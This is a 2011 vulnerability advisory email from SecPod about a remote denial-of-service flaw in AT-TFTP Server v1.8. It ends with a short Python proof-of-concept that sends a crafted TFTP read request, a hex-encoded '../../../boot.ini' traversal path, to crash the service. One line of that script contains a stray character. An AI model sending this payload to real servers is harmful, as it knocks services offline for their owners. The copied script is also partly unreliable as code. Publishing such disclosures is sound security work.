Hi, SecPod Research Team Member Antu Sanadi has found a DoS Vulnerability in AT-TFTP Server Advisory and POC details has been attached to this mail. Regards, SecPod Research Team http://www.secpod.com
############################################################################### AT-TFTP Server v1.8 Remote Denial of Service Vulnerability SecPod Technologies (www.secpod.com) Author: Antu Sanadi ############################################################################### SecPod ID: 1013 01/04/2011 Issue Discovered 04/04/2011 Vendor Notified No Response from the Vendor 25/04/2011 Advisory Released Class: Denial of Service Severity: High Overview: --------- AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability as it fails to handle 'read' requests from the client properly. Technical Description: ---------------------- The vulnerability is caused by an error in the "TFTPD.EXE" which causes the server to crash when no acknowledgement response is sent back to the server after a successful 'read'. Impact: -------- Successful exploitation could allow an attacker to crash a vulnerable server. Affected Software: ------------------ AT-TFTP Server version 1.8 Tested on, AT-TFTP Server version 1.8 on Windows XP SP3 References: ----------- http://secpod.org/blog/?p=194 http://www.alliedtelesis.co.nz/ http://secpod.org/SecPod_AT_TFTP_DoS-POC.py http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt Proof of Concept: ---------------- http://secpod.org/blog/?p=194 http://secpod.org/SecPod_AT_TFTP_DoS-POC.py Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NONE CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = COMPLETE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C) Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this vulnerability.
#!/usr/bin/python ############################################################################## # Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX # http://secpod.org/wintftp_dos_poc.py # Reference : # Author : Antu Sanadi from SecPod Technologies (www.secpod.com) # # Exploit will crash AT-TFTP Server v1.8 Service # Tested against AT-TFTP Server v1.8 server ############################################################################## import socket import sys host = '127.0.0.1' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) addr = (host,port)1 data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\ '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00' s.sendto(data, (host, port))
